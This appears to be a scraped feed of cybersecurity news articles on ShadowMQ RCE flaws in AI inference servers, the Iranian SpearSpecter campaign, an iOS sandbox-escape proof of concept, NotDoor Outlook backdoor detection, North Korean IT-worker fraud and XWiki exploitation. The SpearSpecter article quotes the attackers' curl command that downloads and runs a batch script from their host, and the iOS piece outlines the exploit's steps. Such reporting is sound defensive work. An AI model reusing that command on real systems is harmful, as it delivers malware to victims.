Critical RCE Vulnerabilities in AI Inference Engines Exposes Meta, Nvidia and Microsoft Frameworks

As artificial intelligence infrastructure rapidly expands, critical security flaws threaten the backbone of enterprise AI deployments.

Security researchers at Oligo Security have uncovered a series of dangerous Remote Code Execution (RCE) vulnerabilities affecting major AI frameworks from Meta, NVIDIA, Microsoft, and PyTorch projects, including vLLM and SGLang.

The vulnerabilities, collectively termed “ShadowMQ,” stem from the unsafe implementation of ZeroMQ (ZMQ) communications combined with Python’s pickle deserialization.

What makes this threat particularly alarming is how it spread across the AI ecosystem through code reuse and copy-paste development practices.

How the Vulnerability Spread Across Frameworks

The investigation began in 2024 when researchers analyzed Meta’s Llama Stack and discovered the dangerous use of ZMQ’s recv_pyobj() method, which deserializes data using Python’s pickle module.

ShadowMQ Vulnerability CVE Data Table

CVE ID	Product	Severity	CVSS Score	Vulnerability Type
CVE-2024-50050	Meta Llama Stack	Critical	9.8	Remote Code Execution
CVE-2025-30165	vLLM	Critical	9.8	Remote Code Execution
CVE-2025-23254	NVIDIA TensorRT-LLM	Critical	9.3	Remote Code Execution
CVE-2025-60455	Modular Max Server	Critical	9.8	Remote Code Execution
N/A (Unpatched)	Microsoft Sarathi-Serve	Critical	9.8	Remote Code Execution
N/A (Incomplete Fix)	SGLang	Critical	9.8	Remote Code Execution

This configuration created unauthenticated network sockets that could execute arbitrary code during deserialization, enabling remote attackers to compromise systems.

After Meta patched the vulnerability (CVE-2024-50050), Oligo researchers found identical security flaws across multiple frameworks.

NVIDIA’s TensorRT-LLM, PyTorch projects vLLM and SGLang, and Modular’s Max Server all contained nearly identical vulnerable patterns.

Oligo Code analysis revealed that entire files were copied between projects, spreading the security flaw like a virus. These AI inference servers power critical enterprise infrastructure, processing sensitive data across GPU clusters.

Organizations trusting SGLang include xAI, AMD, NVIDIA, Intel, LinkedIn, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, MIT, Stanford, UC Berkeley, and numerous other major technology companies.

Successful exploitation could allow attackers to execute arbitrary code, escalate privileges, exfiltrate model data, or install cryptocurrency miners.

Oligo researchers identified thousands of exposed ZMQ sockets communicating unencrypted over the public internet. However, Microsoft’s Sarathi-Serve and SGLang remain vulnerable with incomplete fixes.

Organizations should immediately update to patched versions, avoid using pickle with untrusted data, implement authentication for ZMQ communications, and restrict network access to ZMQ endpoints.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Critical RCE Vulnerabilities in AI Inference Engines Exposes Meta, Nvidia and Microsoft Frameworks appeared first on Cyber Security News.

¶¶¶¶¶

Iranian SpearSpecter Attacking High-Value Officials Using Personalized Social Engineering Tactics

·

cyber security, Cyber Security News, Threats
A dangerous espionage campaign is targeting senior government and defense officials worldwide. Iranian hackers are using fake conference invitations and meeting requests to trick victims.

The attackers spend weeks building trust before striking. They reach out through WhatsApp to make their messages look legitimate.

This campaign, known as SpearSpecter, combines patience with powerful malware to steal sensitive information.

The attackers work for Iran’s Islamic Revolutionary Guard Corps Intelligence Organization. They operate under several names including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.

Their main goal is stealing sensitive information from people with access to government secrets. What makes this group dangerous is how they adapt their methods and use both credential theft and long-term spying tools.

Israel National Digital Agency security researchers identified the malware and uncovered the operation scope. The campaign has been running for months with no signs of stopping.

The attackers target both officials and family members to increase pressure and find new entry points.

Advanced Infection Through WebDAV and PowerShell

The infection starts when victims receive a link claiming to be an important document for a meeting. When clicked, the link redirects to a file on OneDrive.

Attackers abuse the Windows search-ms protocol to trigger a popup asking users to open Windows Explorer. If victims accept, their computer connects to the attacker’s WebDAV server.

The WebDAV server displays what looks like a PDF file, but it’s actually a malicious shortcut. When opened, this shortcut runs hidden commands that download a batch script from Cloudflare Workers using the following command:-
```
cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
```
Initial access LNK file shared via WebDAV pretending to be a PDF file (Source – Govextra)

The script loads TAMECAT, a sophisticated PowerShell-based backdoor that operates entirely in memory. TAMECAT uses AES-256 encryption to communicate with command servers through multiple channels including web traffic, Telegram, and Discord.

TAMECAT collects browser passwords by launching Microsoft Edge with remote debugging and suspending Chrome processes. It captures screenshots every fifteen seconds and searches for documents. All stolen data gets split into five megabyte chunks and uploaded.

TAMECAT’s In-Memory Loader Chain (Source – Govextra)

To survive restarts, TAMECAT creates registry entries that run batch files at login. The malware avoids detection by using trusted Windows programs. Researchers found attackers using Cloudflare Workers for command infrastructure.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Iranian SpearSpecter Attacking High-Value Officials Using Personalized Social Engineering Tactics appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
5 Reasons Why Attackers Are Phishing Over LinkedIn

·

Phishing attacks are no longer confined to the email inbox, with 1 in 3 phishing attacks now taking place over non-email channels like social media, search engines, and messaging apps. LinkedIn in particular has become a hotbed for phishing attacks, and for good reason. Attackers are running sophisticated spear-phishing attacks against company executives, with recent campaigns seen targeting

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
SilentButDeadly: New Tool Blocks Network Traffic to Bypass EDR and Antivirus

·

Anti Virus, cyber security, Cyber Security News

A newly released open-source tool called SilentButDeadly is raising security concerns by demonstrating how attackers can effectively turn off Endpoint Detection and Response systems and antivirus software without terminating any processes. Developed by security researcher Ryan Framiñán and released on November 2, 2025, the tool exploits the Windows Filtering Platform to sever cloud connectivity for […]

The post SilentButDeadly: New Tool Blocks Network Traffic to Bypass EDR and Antivirus appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT

·

The threat actor known as Dragon Breath has been observed making use of a multi-stage loader codenamed RONINGLOADER to deliver a modified variant of a remote access trojan called Gh0st RAT. The campaign, which is primarily aimed at Chinese-speaking users, employs trojanized NSIS installers masquerading as legitimate like Google Chrome and Microsoft Teams, according to Elastic Security Labs. “The

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
New MobileGestalt Exploit for iOS 26.0.1 Enables Unauthorized Writes to Protected Data

·

cyber security, Cyber Security News, iOS, vulnerability

A sandbox escape vulnerability affecting iPhones and iPads running iOS 16.2 beta 1 or earlier versions. The proof-of-concept (POC) exploits weaknesses in the itunesstored and bookassetd daemons, enabling attackers to modify sensitive files on the device’s Data partition areas typically protected from unauthorized access.

Researcher Kim shared the details in a blog post on October 20, 2025, emphasizing that the findings stem from her reverse engineering efforts and urging readers to verify independently.

The vulnerability hinges on a maliciously crafted “downloads.28.sqlitedb” database, which tricks the itunesstored daemon into downloading and placing a secondary database, “BLDatabaseManager.sqlite,” into a shared system group container.

While itunesstored operates under strict sandbox limits, the subsequent stage leverages bookassetd a daemon handling iBooks downloads with broader permissions.

MobileGestalt Exploit

This allows writes to mobile-owned paths like /private/var/mobile/Library/FairPlay/, /private/var/mobile/Media/, and even system caches such as /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist.

In a demo on an iPhone 12 running iOS 16.0.1, Kim modified the MobileGestalt cache to spoof the device as an iPod touch (model iPod9,1), proving the exploit’s reach.

The process requires preparing the target file in a modified EPUB format, zipped without compressing the mimetype file, and hosting supporting assets like iTunesMetadata.plist on a server.

Attackers must then use tools like 3uTools or afcclient to inject the databases into /var/mobile/Media/Downloads/, followed by targeted reboots to trigger the downloads.

Expected behavior halts writes to unauthorized paths, but the flaw permits modifications unless the destination is root-controlled.

Kim lists numerous writable locations, including caches and media directories, potentially enabling persistence, configuration tampering, or data exfiltration.

The exploit requires physical or tethered access to place the database, but once set up, it could facilitate more sophisticated attacks on jailbroken or compromised devices.

Apple has not yet commented, and Kim notes the issue may be patched imminently. She provides basic files on GitHub for educational use, stressing that the research is for learning only and not for illegal activities.

As iOS evolves with tighter sandboxing, this POC underscores ongoing challenges in daemon isolation. Security teams should monitor for related indicators, like anomalous database entries in download logs.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post New MobileGestalt Exploit for iOS 26.0.1 Enables Unauthorized Writes to Protected Data appeared first on Cyber Security News.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Google Launches Public Preview of Its Alert Triage and Investigation Agent for Security Operations

·

cyber security, Cyber Security News, Google

Google has taken a significant step toward its vision of an Agentic SOC by announcing the public preview of the Alert Triage and Investigation agent, a purpose-built AI agent natively embedded into Google Security Operations. This advancement brings the promise of intelligent agents assisting human analysts with routine tasks, decision-making, and workflow automation closer to […]

The post Google Launches Public Preview of Its Alert Triage and Investigation Agent for Security Operations appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Researchers Detailed Techniques to Detect Outlook NotDoor Backdoor Malware

·

cyber security, Cyber Security News, Threats
Outlook NotDoor backdoor malware first appeared in threat campaigns identified by Lab52, the intelligence arm of Spanish firm S2 Grupo.

Linked to APT28/Fancy Bear, NotDoor leverages malicious Outlook macros for persistent access and data theft. Attackers embed these macro payloads within Outlook’s data files to monitor incoming emails and trigger hidden code on infected systems.

This has enabled advanced persistent threat groups to quietly exfiltrate files, execute commands, and maintain stealthy control by abusing a trusted application.

Initial compromise often begins with DLL sideloading. Threat actors place a maliciously crafted SSPICLI.dll next to the legitimate OneDrive.exe, exploiting how Windows prioritizes loading DLLs.

The fake DLL allows the actor to execute commands and stage malware components without raising alarms.

Infection artifacts include multiple files: a real OneDrive.exe, SSPICLI.dll (malicious), tmp7E9C.dll (renamed legitimate DLL), and testtemp.ini containing the VBA macro. These details are crucial for defenders tracking suspicious file events and Registry modifications.

Splunk security researchers were among the first to thoroughly analyze NotDoor. Their deep dive revealed encoded PowerShell commands launched by OneDrive.exe and how the malware quietly creates TEMP directories for dropped artifacts.

The detection guide by Splunk helps defenders recognize rogue processes spawning PowerShell, network calls, and registry changes that activate macro auto-loading, disable security prompts, or allow all macros without warning.

This research provides valuable blueprints for building reliable detection.

Outlook Macro Persistence and Obfuscation

A key NotDoor technique involves copying the macro-laden testtemp.ini file to Outlook’s VBAProject.OTM location within the user’s Roaming directory.

This file holds all custom automation and email-handling macros for Outlook. Under normal circumstances, only Outlook should write here, so any outside process (such as malware) is highly suspicious.

The macro backdoor sets up C2 communications: it can receive and execute attacker instructions via email triggers, and quietly send data back out.

It relies on obfuscation, randomized variable names, and custom encoding to slip past simple scans. Splunk researchers pinpointed registry modifications as pivotal for persistence.

The malware changes settings to automatically load the malicious macro at startup (LoadMacroProviderOnBoot) and lowers Outlook’s macro security level to let all macros execute, suppressing security dialogs.

The following code snippet shows a common Splunk detection search for registry changes:-
```
 tstats security_contents_summaries_only count FROM datamodelEndpoint.Registry WHERE Registry.registrypath=HKCU\\Software\\Microsoft\\Office\\Outlook\\Security\\LoadMacroProviderOnBoot Registry.registryvaluedata=0x00000001
```
Outlook Security Registry Changes (Source – Splunk)

Defenders can follow these Splunk detection models to catch NotDoor malware, watching for macro file events and registry modifications that signal infection and persistence.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Researchers Detailed Techniques to Detect Outlook NotDoor Backdoor Malware appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
North Korean Hackers Infiltrated 136 U.S. Companies to Generate $2.2 Million in Revenue

·

cyber security, Cyber Security News, Hacking News

The U.S. Justice Department announced major actions against North Korean cybercrime, including five people admitting guilt and the government taking more than $15 million in property linked to the crimes.

These operations reveal how the Democratic People’s Republic of Korea (DPRK) uses fraudulent IT workers and cryptocurrency heists to fund its weapons programs while evading international sanctions.

Facilitators in the United States and Ukraine helped North Korean actors secure remote IT jobs with American companies.

North Korean State-Sponsored Cybercrime

The scheme involved using stolen or false identities and hosting company-provided laptops at U.S. residences to create the false appearancethat workers were based in the U.S.

This elaborate fraud impacted more than 136 U.S. companies, generating over $2.2 million in revenue for the North Korean regime and compromising the identities of over 18 American citizens.

According to the Justice Department, five individuals have admitted they are guilty of their roles in these schemes.

Three U.S. nationals, Audricus Phagnasay, Jason Salazar, and Alexander Paul Travis, admitted to providing their identities to overseas IT workers and hosting laptops at their homes.

Travis, an active-duty U.S. Army member at the time, received at least $51,397 for his participation. Their scheme alone earned approximately $1.28 million from victim companies.

Ukrainian national Oleksandr Didenko pleaded guilty to stealing U.S. citizen identities and selling them to overseas IT workers, enabling fraudulent employment at 40 U.S. companies.

Didenko agreed to forfeit more than $1.4 million. Additionally, Erick Ntekereze Prince admitted to supplying falsely certified IT workers through his company, earning over $89,000.

Separately, the Justice Department went to court to get back over $15 million in cryptocurrency stolen by APT38, a North Korean military hacking group.

The group executed four major heists in 2023, stealing virtual currency from platforms in Estonia, Panama, and Seychelles, totaling approximately $382 million.

These enforcement actions demonstrate the government’s comprehensive approach to disrupting North Korean revenue generation schemes that fund weapons development and threaten national security.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post North Korean Hackers Infiltrated 136 U.S. Companies to Generate $2.2 Million in Revenue appeared first on Cyber Security News.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Hackers Exploiting XWiki Vulnerability in the Wild to Hire the Servers for Botnet

·

cyber security, Cyber Security News, vulnerability, Vulnerability News

A sharp increase in attacks targeting a critical vulnerability in XWiki servers. Multiple threat actors are actively exploiting CVE-2025-24893 to deploy botnets and coin miners, and to establish unauthorized server access across the internet.

Since the initial discovery on October 28, 2025, exploitation has expanded dramatically. VulnCheck reported that multiple independent attackers are now actively targeting the vulnerability.

Ranging from automated botnets to sophisticated actors using custom tooling and specialized scanners. Within just two days of the first report, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-24893 to its Known Exploited Vulnerabilities catalog on October 30, 2025.

Since then, canary security systems have seen a big increase in scanning and attack attempts. The group of attackers is wide and includes many different types of hackers.

Rapid Exploitation Expansion

On November 3, 2025, the RondoDox botnet began incorporating this vulnerability into its attack arsenal, leading to a sharp increase in exploitation attempts.

These attacks are identifiable by their distinctive HTTP User-Agent signatures and payload naming conventions.

CVE ID Vulnerability Type Affected Software
CVE-2025-24893 Remote Code Execution (RCE) XWiki

Cryptocurrency mining operations have also joined the wave of exploitation. Multiple coin miner campaigns have been detected fetching secondary payloads from compromised servers.

VulnCheck researchers observed attackers downloading hidden scripts that ultimately deploy cryptocurrency mining software on vulnerable XWiki installations.

More concerning are the reverse shell attempts, indicating potential hands-on-keyboard activity. VulnCheck researchers identified several attempts to establish direct command-and-control connections.

Including one attack from an AWS-associated IP address with no prior abuse history, suggesting more targeted operations beyond automated scanning.

The vulnerability allows attackers to execute arbitrary code on internet-exposed XWiki servers through specially crafted requests to the SolrSearch endpoint.

Attackers exploit the Groovy scripting functionality to download and execute malicious payloads, ranging from botnet recruitment scripts to cryptocurrency miners.

VulnCheck analysts have documented attacks originating from numerous IP addresses across different countries, with payload hosting servers frequently changing locations.

The exploitation techniques include direct payload execution, multi-stage infection chains, and hidden shell scripts designed to evade detection.

By the time CISA added the vulnerability to its catalog, attackers were already days ahead of defenders. This highlights a critical gap between initial exploitation and widespread visibility.

Organizations using Canary Intelligence and early warning systems gained crucial time to patch and defend before attacks became widespread.

VulnCheck Security teams should monitor for unusual requests to XWiki’s SolrSearch functionality, unexpected outbound connections from XWiki servers, and any signs of cryptocurrency mining or botnet activity.

Organizations running XWiki installations should immediately apply available security patches and review server logs for indicators of compromise.

Network segmentation and restricting internet exposure of XWiki servers can significantly reduce the attack surface. It is also recommended to add security rules that can spot attacks using the CVE-2025-24893 bug.

The rapid adoption of this vulnerability by multiple threat actor groups underscores the importance of early detection and immediate patching.

Defenders who wait for official advisories are already behind the curve of exploitation, making proactive security monitoring essential in today’s threat landscape.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Hackers Exploiting XWiki Vulnerability in the Wild to Hire the Servers for Botnet appeared first on Cyber Security News.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

How the Vulnerability Spread Across Frameworks

ShadowMQ Vulnerability CVE Data Table

Advanced Infection Through WebDAV and PowerShell

MobileGestalt Exploit

Outlook Macro Persistence and Obfuscation

North Korean State-Sponsored Cybercrime

Rapid Exploitation Expansion